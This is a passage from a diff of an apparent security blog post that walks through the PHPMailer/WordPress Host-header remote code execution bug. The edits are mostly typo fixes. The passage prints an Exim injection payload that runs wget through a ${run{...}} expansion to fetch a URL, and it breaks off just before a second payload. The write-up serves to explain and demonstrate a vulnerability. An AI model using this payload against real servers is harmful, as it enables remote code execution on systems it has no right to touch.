AlvFolgado/alvfolgado.github.io/_posts/2017-07-02-phpmailerwordpress.md

 	$phpmailer->setFrom( $from_email, $from_name);
 ```
-As we can see, wht $from_email is being crafted using the 'SERVER_NAME' that came actually from the mentioned HTTP Header.
+As we can see, '$from_email' is being crafted using the 'SERVER_NAME' that actually comes from the cited HTTP HOST Header.

 Natural thing to do will be testing the same payload we did in previous PoC but erasing the "email@" part from it.
-Let's see what happens (we need to use some sript or proxy tool):
+Let's see what happens (we need to use some script or proxy tool):

 Payload:
 dd(tmp1 -be ${run{/usr/bin/wget${substr{10}{1}{$tod_log}}http://127.0.0.1/test}} tmp2)

 ![](/images/wordpress46request.png)

-Bad request is being obtained.
+Bad request is being responded.
 Apache Server will not let us to put that HOSTNAME Header with '/' symbols.
 Fortunately, again, LegalHackers have resolved this problem by studying the env. variables from exim4 (more information in suggested posts).
 Once again we perform the Request with the valid payload:

 ```bash
 Payload: